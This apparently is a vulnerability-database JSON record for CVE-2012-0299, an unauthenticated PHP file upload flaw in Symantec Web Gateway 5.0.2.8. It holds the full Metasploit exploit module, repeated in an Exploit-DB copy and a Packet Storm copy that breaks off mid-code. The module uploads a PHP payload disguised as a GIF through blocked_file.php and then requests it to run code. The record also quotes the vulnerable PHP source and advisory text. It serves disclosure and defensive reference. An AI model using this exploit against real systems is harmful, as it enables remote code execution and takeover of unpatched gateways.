{"id": "MSF:EXPLOIT/LINUX/HTTP/SYMANTEC_WEB_GATEWAY_FILE_UPLOAD", "type": "metasploit", "bulletinFamily": "exploit", "title": "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Symantec Web Gateway's HTTP service. Due to the incorrect use of file extensions in the upload_file() function, attackers may to abuse the spywall/blocked_file.php file in order to upload a malicious PHP file without any authentication, which results in arbitrary code execution.\n", "published": "2012-06-09T20:27:27", "modified": "2020-10-02T20:00:37", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0299", "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00"], "cvelist": ["CVE-2012-0299"], "lastseen": "2020-10-13T00:33:00", "viewCount": 21, "enchantments": {"score": {"value": 8.8, "vector": "NONE", "modified": "2020-10-13T00:33:00", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-0299"]}, {"type": "exploitdb", "idList": ["EDB-ID:19038"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12416", "SECURITYVULNS:DOC:28147"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113486"]}, {"type": "attackerkb", "idList": ["AKB:E371A741-0446-47E4-97E5-21715E5EA84A"]}, {"type": "nessus", "idList": ["SYMANTEC_WEB_GATEWAY_SYM12-006.NASL", "SYMANTEC_WEB_GATEWAY_UPLOAD_FILE_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-82"]}, {"type": "zdi", "idList": ["ZDI-12-091"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310802632"]}, {"type": "symantec", "idList": ["SMNTC-1250"]}], "modified": "2020-10-13T00:33:00", "rev": 2}, "vulnersScore": 8.8}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/symantec_web_gateway_file_upload.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Symantec Web Gateway's\n HTTP service. Due to the incorrect use of file extensions in the upload_file()\n function, attackers may to abuse the spywall/blocked_file.php file in order to\n upload a malicious PHP file without any authentication, which results in arbitrary\n code execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Tenable Network Security, Vulnerability Discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-0299' ],\n [ 'OSVDB', '82025' ],\n [ 'BID', '53443' ],\n [ 'ZDI', '12-091' ],\n [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['Symantec Web Gateway 5.0.2.8', {}],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2012-05-17',\n 'DefaultTarget' => 0))\n\n self.needs_cleanup = true\n end\n\n\n def check\n res = send_request_raw({\n 'method' => 'GET',\n 'uri' => '/spywall/login.php'\n })\n\n if res and res.body =~ /\\<title\\>Symantec Web Gateway\\<\\/title\\>/\n return Exploit::CheckCode::Detected\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n def on_new_session(client)\n print_warning(\"Deleting temp.php\")\n if client.type == \"meterpreter\"\n client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")\n client.fs.file.rm(\"temp.php\")\n else\n client.shell_command_token(\"rm temp.php\")\n end\n end\n\n def exploit\n uri = target_uri.path\n uri << '/' if uri[-1,1] != '/'\n\n peer = \"#{rhost}:#{rport}\"\n payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'\n before_filename = rand_text_alpha(rand(10) + 5)\n after_filename = rand_text_alpha(rand(10) + 5)\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(\"true\", nil, nil, \"form-data; name=\\\"submitted\\\"\")\n post_data.add_part(before_filename, \"application/octet-stream\", nil, \"form-data; name=\\\"before_filename\\\"\")\n post_data.add_part(after_filename, \"application/octet-stream\", nil, \"form-data; name=\\\"after_filename\\\"\")\n post_data.add_part(\"<?php #{payload.encoded} ?>\", \"image/gif\", nil, \"form-data; name=\\\"new_image\\\"; filename=\\\"#{payload_name}\\\"\")\n\n print_status(\"Sending PHP payload (#{payload_name})\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, \"spywall/blocked_file.php\"),\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => post_data.to_s\n })\n\n # If the server returns 200 and the body contains the name\n # of the default file, we assume we uploaded the malicious\n # file successfully\n if not res or res.code != 200 or res.body !~ /temp.php/\n print_error(\"File wasn't uploaded, aborting!\")\n return\n end\n\n print_status(\"Executing PHP payload (#{payload_name})\")\n # Execute our payload\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => \"#{uri}spywall/images/upload/temp/temp.php\"\n })\n\n # If we don't get a 200 when we request our malicious payload, we suspect\n # we don't have a shell, either. Print the status code for debugging purposes.\n if res and res.code != 200\n print_status(\"Server returned #{res.code.to_s}\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}

{"cve": [{"lastseen": "2020-10-03T12:05:59", "description": "The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to upload arbitrary code to a designated pathname, and possibly execute this code, via unspecified vectors.", "edition": 3, "cvss3": {}, "published": "2012-05-21T20:55:00", "title": "CVE-2012-0299", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0299"], "modified": "2017-12-05T02:29:00", "cpe": ["cpe:/a:symantec:web_gateway:5.0", "cpe:/a:symantec:web_gateway:5.0.2", "cpe:/a:symantec:web_gateway:5.0.1"], "id": "CVE-2012-0299", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0299", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:symantec:web_gateway:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-15T18:41:44", "bulletinFamily": "info", "cvelist": ["CVE-2012-0299"], "description": "The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to upload arbitrary code to a designated pathname, and possibly execute this code, via unspecified vectors.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\nThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations \nof Symantec Web Gateway. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists because Symantec Web Gateway allows unauthenticated users to upload a file \nwhile preserving the file extension. This allows users to upload additional script files that can \nbe used to execute remote code from user supplied commands under the context of the webserver.\n\n## Details\n\n**blocked_file**\n \n \n <?php\n \tinclude_once(\"config/conf.php\");\n \tinclude_once(\"config/db.php\");\n \tinclude_once(\"includes/util_functions.php\");\n \n \n \tif (isset($_POST['submitted']))\n \t{\n \t\t$updated = true;\n \t\tunescape_form_vals(); // remove slashes form values\tas we are displaying only\n \n \t\t$new_image = $_FILES['new_image'];\n \t\t$before_filename = $_POST['before_filename'];\n \t\t$after_filename = $_POST['after_filename'];\n \n \t\t$image_query = \"select value from mi5_blockpagemsg where name='image_name'\";\n \t\t$image_result = @mysql_query($image_query);\n \t\t$image_row = @mysql_fetch_assoc($image_result);\n \t\t$old_image_name = $image_row['value'];\n \t\t@mysql_free_result($image_result);\n \t\t$image_name = $old_image_name;\n \t\t$image_url = $upload_image_url . \"/\". $image_name;\n \n \t\tif ($new_image['error'] == UPLOAD_ERR_OK && $new_image['size'] > 0) // file is uploaded\n \t\t{\n \t\t\t$return_arr = upload_file($new_image, $upload_image_path_temp, \"temp\");\n \t\t\tif ($return_arr['uploaded'])\n \t\t\t{\n \t\t\t\t$image_name = $return_arr['new_file_name'];\n \t\t\t\t$image_url = $upload_image_url_temp . \"/\". $image_name;\n \t\t\t}\n \t\t}\n \t}\n \n ?>\n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <title>Blocked File Download</title>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\" />\n <link rel=\"stylesheet\" href=\"styles/mi5.css\" />\n </head>\n \n <body>\n <div id=\"mainContent\">\n \n <div id=\"mainText\">\n <?php\n \n \t\t\t\tif ($image_name == '')\n \t\t\t\t{\n \t\t\t\t\t$image_url = \"images/mi5.gif\";\n \t\t\t\t}\n \n \t\t\t?>\n <img src=\"<?php echo $image_url . \"?t=\".time(); ?>\" alt=\"Symantec Defense Centre\" style=\"border: 1px solid #ddd;\" /> <hr noshade=\"noshade\" size=\"1\" style=\"margin-bottom: 10px;\" />\n <table><tr><!--<td valign=\"top\" style=\"width: 120px;\">\n \n <p><a href=\"javascript:history.go(-1);\">&laquo; Previous Page</a></p>\n \n </td>-->\n \n <td style=\"padding-left: 15px; border-left: 1px solid #999;\">\n <h3>Symantec Enterprise Spygate</h3>\n <h1>Downloading this file is prohibited</h1>\n <p><?php echo $before_filename; ?> %%File%%<?php echo $after_filename; ?></p>\n \n <p>If you think this spyware detection was in error, please click here.</p>\n \n </td></tr></table>\n \n </div>\n <div class=\"copyright\">&copy; Copyright 2004-2006, Symantec</div>\n </div>\n \n \n </body>\n </html>\n \n\n**blocked_url**\n \n \n <?php\n \tinclude_once(\"config/conf.php\");\n \tinclude_once(\"config/db.php\");\n \tinclude_once(\"includes/util_functions.php\");\n \n \n \tif (isset($_POST['submitted']))\n \t{\n \t\t$updated = true;\n \t\tunescape_form_vals(); // remove slashes form values\tas we are displaying only\n \n \t\t$new_image = $_FILES['new_image'];\n \t\t$before_url = $_POST['before_url'];\n \t\t$after_url = $_POST['after_url'];\n \n \t\t$image_query = \"select value from mi5_blockpagemsg where name='image_name'\";\n \t\t$image_result = @mysql_query($image_query);\n \t\t$image_row = @mysql_fetch_assoc($image_result);\n \t\t$old_image_name = $image_row['value'];\n \t\t@mysql_free_result($image_result);\n \t\t$image_name = $old_image_name;\n \t\t$image_url = $upload_image_url . \"/\". $image_name;\n \n \t\tif ($new_image['error'] == UPLOAD_ERR_OK && $new_image['size'] > 0) // file is uploaded\n \t\t{\n \t\t\t$return_arr = upload_file($new_image, $upload_image_path_temp, \"temp\");\n \t\t\tif ($return_arr['uploaded'])\n \t\t\t{\n \t\t\t\t$image_name = $return_arr['new_file_name'];\n \t\t\t\t$image_url = $upload_image_url_temp . \"/\". $image_name;\n \t\t\t}\n \t\t}\n \t}\n \n ?>\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <title>Blocked URL</title>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\" />\n <link rel=\"stylesheet\" href=\"styles/mi5.css\" />\n </head>\n \n <body>\n <div id=\"mainContent\">\n \n <div id=\"mainText\">\n <?php\t\t\t\tif ($image_name == '')\n \t\t\t\t{\n \t\t\t\t\t$image_url = \"images/mi5.gif\";\n \t\t\t\t}\n \n \t\t\t?>\n <img src=\"<?php echo $image_url . \"?t=\".time(); ?>\" alt=\"Symantec Defense Centre\" style=\"border: 1px solid #ddd;\" /> <hr noshade=\"noshade\" size=\"1\" style=\"margin-bottom: 10px;\" />\n <table><tr><!--<td valign=\"top\" style=\"width: 120px;\">\n \n <p><a href=\"javascript:history.go(-1);\">&laquo; Previous Page</a></p>\n \n </td>-->\n \n <td style=\"padding-left: 15px; border-left: 1px solid #999;\">\n <h3>Symantec Enterprise Spygate</h3>\n <h1>Accessing web pages from this URL is prohibited</h1>\n <p><?php echo $before_url; ?> %%URL%%<?php echo $after_url; ?></p>\n \n <p>If you think this spyware detection was in error, please click here.</p>\n \n </td></tr></table>\n \n </div>\n <div class=\"copyright\">&copy; Copyright 2004-2006, Symantec</div>\n </div>\n \n \n </body>\n </html>\n \n", "modified": "2020-02-13T00:00:00", "published": "2012-05-21T00:00:00", "id": "AKB:E371A741-0446-47E4-97E5-21715E5EA84A", "href": "https://attackerkb.com/topics/W0hUuAVM1c/symantec-web-gateway-upload-file-remote-code-execution-vulnerability", "type": "attackerkb", "title": "Symantec Web Gateway upload_file Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0299"], "description": "File upload vulnerability in Symantec Web Gateway blocked_file.php\n\nVulnerability Type: File Upload", "modified": "2013-04-02T00:00:00", "published": "2012-06-09T00:00:00", "id": "E-82", "href": "", "type": "dsquare", "title": "Symantec Web Gateway 5.0.2 File Upload", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:42:05", "bulletinFamily": "info", "cvelist": ["CVE-2012-0299"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Symantec Web Gateway. Authentication is not required to exploit this vulnerability. The specific flaw exists because Symantec Web Gateway allows unauthenticated users to upload a file while preserving the file extension. This allows users to upload additional script files that can be used to execute remote code from user supplied commands under the context of the webserver.", "modified": "2012-06-22T00:00:00", "published": "2012-06-08T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-091/", "id": "ZDI-12-091", "title": "Symantec Web Gateway upload_file Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T10:56:36", "description": "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability. CVE-2012-0299. Webapps exploit for php platform", "published": "2012-06-10T00:00:00", "type": "exploitdb", "title": "Symantec Web Gateway 5.0.2.8 - Arbitrary PHP File Upload Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0299"], "modified": "2012-06-10T00:00:00", "id": "EDB-ID:19038", "href": "https://www.exploit-db.com/exploits/19038/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a file upload vulnerability found in Symantec Web Gateway's\r\n\t\t\t\tHTTP service. Due to the incorrect use of file extensions in the upload_file()\r\n\t\t\t\tfunction, this allows us to abuse the spywall/blocked_file.php file in order to\r\n\t\t\t\tupload a malicious PHP file without any authentication, which results in arbitrary\r\n\t\t\t\tcode execution.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Tenable Network Security', # Vulnerability Discovery\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-0299' ],\r\n\t\t\t\t\t[ 'OSVDB', '82025' ],\r\n\t\t\t\t\t[ 'BID', '53443' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-091' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\"\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"none\"\r\n\t\t\t\t},\r\n\t\t\t'Platform' => ['php'],\r\n\t\t\t'Arch' => ARCH_PHP,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Symantec Web Gateway 5.0.2.8', {}],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"May 17 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\r\n\tdef check\r\n\t\tres = send_request_raw({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => '/spywall/login.php'\r\n\t\t})\r\n\r\n\t\tif res and res.body =~ /\\<title\\>Symantec Web Gateway\\<\\/title\\>/\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\tend\r\n\r\n\tdef on_new_session(client)\r\n\t\tif client.type == \"meterpreter\"\r\n\t\t\tclient.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")\r\n\t\t\tclient.fs.file.rm(\"temp.php\")\r\n\t\telse\r\n\t\t\tclient.shell_command_token(\"rm temp.php\")\r\n\t\tend\r\n\tend\r\n\r\n\tdef exploit\r\n\t\turi = target_uri.path\r\n\t\turi << '/' if uri[-1,1] != '/'\r\n\r\n\t\tpeer = \"#{rhost}:#{rport}\"\r\n\t\tpayload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'\r\n\t\tbefore_filename = rand_text_alpha(rand(10) + 5)\r\n\t\tafter_filename = rand_text_alpha(rand(10) + 5)\r\n\r\n\t\tpost_data = Rex::MIME::Message.new\r\n\t\tpost_data.add_part(\"true\", nil, nil, \"form-data; name=\\\"submitted\\\"\")\r\n\t\tpost_data.add_part(before_filename, \"application/octet-stream\", nil, \"form-data; name=\\\"before_filename\\\"\")\r\n\t\tpost_data.add_part(after_filename, \"application/octet-stream\", nil, \"form-data; name=\\\"after_filename\\\"\")\r\n\t\tpost_data.add_part(\"<?php #{payload.encoded} ?>\", \"image/gif\", nil, \"form-data; name=\\\"new_image\\\"; filename=\\\"#{payload_name}\\\"\")\r\n\r\n\t\tprint_status(\"#{peer} - Sending PHP payload (#{payload_name})\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{uri}spywall/blocked_file.php\",\r\n\t\t\t'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n\t\t\t'data' => post_data.to_s\r\n\t\t})\r\n\r\n\t\t# If the server returns 200 and the body contains the name\r\n\t\t# of the default file, we assume we uploaded the malicious\r\n\t\t# file successfully\r\n\t\tif not res or res.code != 200 or res.body !~ /temp.php/\r\n\t\t\tprint_error(\"#{peer} - File wasn't uploaded, aborting!\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status(\"#{peer} - Executing PHP payload (#{payload_name})\")\r\n\t\t# Execute our payload\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => \"#{uri}spywall/images/upload/temp/temp.php\"\r\n\t\t})\r\n\r\n\t\t# If we don't get a 200 when we request our malicious payload, we suspect\r\n\t\t# we don't have a shell, either. Print the status code for debugging purposes.\r\n\t\tif res and res.code != 200\r\n\t\t\tprint_status(\"#{peer} - Server returned #{res.code.to_s}\")\r\n\t\tend\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19038/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-0299"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-091 : Symantec Web Gateway upload_file Remote Code Execution\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-091\r\nJune 8, 2012\r\n\r\n- -- CVE ID:\r\n\r\nCVE-2012-0299\r\n\r\n- -- CVSS:\r\n\r\n7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P\r\n\r\n- -- Affected Vendors:\r\n\r\nSymantec\r\n\r\n- -- Affected Products:\r\n\r\nSymantec Web Gateway\r\n\r\n- -- Vulnerability Details:\r\n\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Symantec Web Gateway. Authentication is not\r\nrequired to exploit this vulnerability. \r\n\r\nThe specific flaw exists because Symantec Web Gateway allows\r\nunauthenticated users to upload a file while preserving the file extension.\r\nThis allows users to upload additional script files that can be used to\r\nexecute remote code from user supplied commands under the context of the\r\nwebserver. \r\n\r\n- -- Vendor Response:\r\n\r\nSymantec has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\n\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se\r\ncurity_advisory&amp;pvid=security_advisory&amp;year=2012&amp;suid=20120517_00\r\n\r\n- -- Disclosure Timeline:\r\n\r\n2011-11-22 - Vulnerability reported to vendor\r\n2012-06-08 - Coordinated public release of advisory\r\n\r\n- -- Credit:\r\n\r\nThis vulnerability was discovered by:\r\n\r\n* Tenable Network Security\r\n\r\n- -- About the Zero Day Initiative &#40;ZDI&#41;:\r\n\r\nEstablished by TippingPoint, The Zero Day Initiative &#40;ZDI&#41; represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors &#40;including competitors&#41; who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 &#40;Build 1950&#41;\r\nCharset: utf-8\r\n\r\nwsBVAwUBT9JmIFVtgMGTo1scAQIcsggAiLXplifuJP03Yc8Z5FD6BofgxIpTW4pe\r\nA1bAHANbzqZUEOeK4+RO0/6xy7mN5urbMZiLRc/iW3GaCYkWBcUUZ1CyT//MsDZ7\r\nvqkR/kWXENtCBUip76vICdAWWK87FvlZa6gZN/kAnj5RiGLZ1QCUddc9yBIApQ/B\r\nu87rKoIcrfccUsM0gwgy9qmbWS52I8hfOUMfXIJs5w+7k8mbIkDbnBR0gSh3bGe3\r\nLMsOp2VxXEDx5Kc3/d53ldIASEQPbPAa4GyYkvrzGdSxACItij+4RDOaaszRrnZE\r\nQbPe7jqJKsxWW8wei+Y4MXIPzlV5QqpVA/NDeR74rF7JyPuLo6c1mA==\r\n=/0OU\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-06-13T00:00:00", "published": "2012-06-13T00:00:00", "id": "SECURITYVULNS:DOC:28147", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28147", "title": "ZDI-12-091 : Symantec Web Gateway upload_file Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:47", "bulletinFamily": "software", "cvelist": ["CVE-2012-0297", "CVE-2012-0299"], "description": "Code execution, unfiltered shell characters.", "edition": 1, "modified": "2012-06-13T00:00:00", "published": "2012-06-13T00:00:00", "id": "SECURITYVULNS:VULN:12416", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12416", "title": "Symantec WebGateway security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:02", "description": "", "published": "2012-06-11T00:00:00", "type": "packetstorm", "title": "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0299"], "modified": "2012-06-11T00:00:00", "id": "PACKETSTORM:113486", "href": "https://packetstormsecurity.com/files/113486/Symantec-Web-Gateway-5.0.2.8-Arbitrary-PHP-File-Upload-Vulnerability.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability\", \n'Description' => %q{ \nThis module exploits a file upload vulnerability found in Symantec Web Gateway's \nHTTP service. Due to the incorrect use of file extensions in the upload_file() \nfunction, this allows us to abuse the spywall/blocked_file.php file in order to \nupload a malicious PHP file without any authentication, which results in arbitrary \ncode execution. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Tenable Network Security', # Vulnerability Discovery \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-0299' ], \n[ 'OSVDB', '82025' ], \n[ 'BID', '53443' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-091' ], \n[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\" \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"none\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['Symantec Web Gateway 5.0.2.8', {}], \n], \n'Privileged' => false, \n'DisclosureDate' => \"May 17 2012\", \n'DefaultTarget' => 0)) \nend \n \n \ndef check \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => '/spywall/login.php' \n}) \n \nif res and res.body =~ /\\<title\\>Symantec Web Gateway\\<\\/title\\>/ \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef on_new_session(client) \nif client.type == \"meterpreter\" \nclient.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\") \nclient.fs.file.rm(\"temp.php\") \nelse \nclient.shell_command_token(\"rm temp.php\") \nend \nend \n \ndef exploit \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \npeer = \"#{rhost}:#{rport}\" \npayload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php' \nbefore_filename = rand_text_alpha(rand(10) + 5) \nafter_filename = rand_text_alpha(rand(10) + 5) \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(\"true\", nil, nil, \"form-data; name=\\\"submitted\\\"\") \npost_data.add_part(before_filename, \"application/octet-stream\", nil, \"form-data; name=\\\"before_filename\\\"\") \npost_data.add_part(after_filename, \"application/octet-stream\", nil, \"form-data; name=\\\"after_filename\\\"\") \npost_data.add_part(\"<?php #{payload.encoded} ?>\", \"image/gif\", nil, \"form-data; name=\\\"new_image\\\"; filename=\\\"#{payload_name}\\\"\") \n \nprint_status(\"#{peer} - Sending PHP payload (#{payload_name})\") \nres = send_request_cgi({ \n'method' => 'POST', 